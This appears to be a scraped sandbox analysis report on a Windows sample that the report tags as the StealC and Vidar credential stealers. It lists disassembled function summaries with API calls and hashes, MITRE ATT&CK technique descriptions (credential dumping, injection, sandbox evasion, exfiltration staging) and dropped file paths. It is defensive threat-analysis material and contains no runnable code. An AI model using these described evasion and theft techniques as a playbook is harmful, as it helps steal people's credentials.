Part of subcall function 6CF8ADC0: TlsGetValue.KERNEL32(?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AEB1
Part of subcall function 6CF8ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AEC9

PK11_FreeSymKey.NSS3(?,6CFD5D40,00000000,?,?,6CFC6AC6,6CFD639C), ref: 6CFEAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CFD5D40,00000000,?,?,6CFC6AC6,6CFD639C), ref: 6CFEAC59
free.MOZGLUE(8CB6FF01,6CFC6AC6,6CFD639C,?,?,?,?,?,?,?,?,?,6CFD5D40,00000000,?,6CFDAAD4), ref: 6CFEAC62

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 5a0bb21411c677805c9dda113fa9249b8e105d506cb9f90bcd6f3606a1746eeb
Instruction ID: f7f2b155494f01cf6039e7dcc50ef6e7e321064694397f0337a9859d960315a2
Opcode Fuzzy Hash: 5a0bb21411c677805c9dda113fa9249b8e105d506cb9f90bcd6f3606a1746eeb
Instruction Fuzzy Hash: BE014FB56016009FDB00CF19E8C0B467BF8EF48B1DF188069E9498F746D735E849CBA1

Function 6CF9FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CF49003,?), ref: 6CF9FD91

Part of subcall function 6CFA0BE0: malloc.MOZGLUE(6CF98D2D,?,00000000,?), ref: 6CFA0BF8
Part of subcall function 6CFA0BE0: TlsGetValue.KERNEL32(6CF98D2D,?,00000000,?), ref: 6CFA0C15

PORT_Alloc_Util.NSS3(A4686CFA,?), ref: 6CF9FDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686CFA,?,?), ref: 6CF9FDC4
free.MOZGLUE(00000000,?,?), ref: 6CF9FDD1

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: c43d4b7d4bd2124aba906c8b18e6d6729d3d0c8a324c5dd5666af04524b50ec2
Instruction ID: f80c7f300984236c79c125ee554a3be3732c1c248bc67a710d5261c212b04eae
Opcode Fuzzy Hash: c43d4b7d4bd2124aba906c8b18e6d6729d3d0c8a324c5dd5666af04524b50ec2
Instruction Fuzzy Hash: BEF0C8B26012029BFF004B55ED80A17B75CEF44299B148036FD09CBB11E761D815C7E1

Function 6D05CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6D05CC61
free.MOZGLUE ref: 6D05CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6D05CC80
free.MOZGLUE(?), ref: 6D05CC87

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 3a89a8e6a696bfe3c101e6fa08f95ea350a206968495f9d6ebb53bef13caf5f2
Instruction ID: 5f9532eba031834edcfdbe51ceb77d0a269725164ed16b9ea221c11f61126a88
Opcode Fuzzy Hash: 3a89a8e6a696bfe3c101e6fa08f95ea350a206968495f9d6ebb53bef13caf5f2
Instruction Fuzzy Hash: 09E06DB6A00608AFCA10DFA8DC88C8B77BCFE8A2747150525EA91C7700D332F915CBE5

Function 6CF39DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6CF39E1F

Part of subcall function 6CEF13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CEC2352,?,00000000,?,?), ref: 6CEF1413
Part of subcall function 6CEF13C0: memcpy.VCRUNTIME140(00000000,R#l,00000002,?,?,?,?,6CEC2352,?,00000000,?,?), ref: 6CEF14C0

Strings

ESCAPE expression must be a single character, xrefs: 6CF39F78
LIKE or GLOB pattern too complex, xrefs: 6CF3A006

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: 02f4a4e107cc8ecea1fc9e00c7a237ba1cf47d106e3e900e07dceee5816a329d
Instruction ID: 13a99ea41d13e6ce939d5aa93e95676f9c3da42b61f7feda76f83915ca4d3ca7
Opcode Fuzzy Hash: 02f4a4e107cc8ecea1fc9e00c7a237ba1cf47d106e3e900e07dceee5816a329d
Instruction Fuzzy Hash: E981F671A046255BDB00CF39C4803AAB7F2AF45318F289659D8AC8B7C5DF35D986C7D1

Function 6CF94D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CF94D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CF94DE6

Strings

%d.%d, xrefs: 6CF94DDE

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: c172dc4920f29cf8b58832f84ba0a96071d0a3600b09ff6f519babe20fa0e4e3
Instruction ID: 5619ba6fe77902e9c8e2ac70e766f0bff0a4e5e697c9ae8d89ec74d9f3accef2
Opcode Fuzzy Hash: c172dc4920f29cf8b58832f84ba0a96071d0a3600b09ff6f519babe20fa0e4e3
Instruction Fuzzy Hash: BA3100B5D042186BFF509B619C05BFF7B68EF54308F050429ED199B791EB709905CBE2

Function 6CFA0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6CFA0DF5
TlsGetValue.KERNEL32 ref: 6CFA0E2D
TlsGetValue.KERNEL32 ref: 6CFA0E58
TlsGetValue.KERNEL32 ref: 6CFA0E84

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: ccc4e4920fef7bc75a6425eeb70f1655c3f167530aa05a276147c1d9cd9143c3
Instruction ID: eeeb6425b9d29efe14b4fb7dc561cbb37440758fcfeb805815196a74cd8cecce
Opcode Fuzzy Hash: ccc4e4920fef7bc75a6425eeb70f1655c3f167530aa05a276147c1d9cd9143c3
Instruction Fuzzy Hash: EF31E3B1904790CFDB105FB8D5C47DABBB4BF06309F05562DD88ACBA11DBB48486DB82

Function 6CF51EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6CF51ECE
free.MOZGLUE(?), ref: 6CF51EDF
free.MOZGLUE(?), ref: 6CF51EEF
free.MOZGLUE(?), ref: 6CF51EF5

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 1904e794c18b4d3fc73c15e4890edd13c07215acfa44164542fd28337f441ae4
Instruction ID: 7891eae7b0844ecec725de9c88e8510601b68161aaf9b468dd7a70a6ffdebd61
Opcode Fuzzy Hash: 1904e794c18b4d3fc73c15e4890edd13c07215acfa44164542fd28337f441ae4
Instruction Fuzzy Hash: 11F0B4B17001056BEB009F65DC45EA773ACFF45158B444424ED0AC7A00D735F42086E9

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DbMBWMxoNv.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CBAFCAKEHDHDHIDHDGDH

C:\ProgramData\CFCBFBGDBKJKECAAKKFH

C:\ProgramData\DGCGDBGCAAEBFIECGHDG

C:\ProgramData\DHCGIDHDAKJECBFHCBAAKJKFCG

C:\ProgramData\EHCFBFBA

C:\ProgramData\FBGHIIJDGHCBFIECBKEGHDHDBA

C:\ProgramData\HCAEHJJK

Windows Analysis Report
DbMBWMxoNv.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre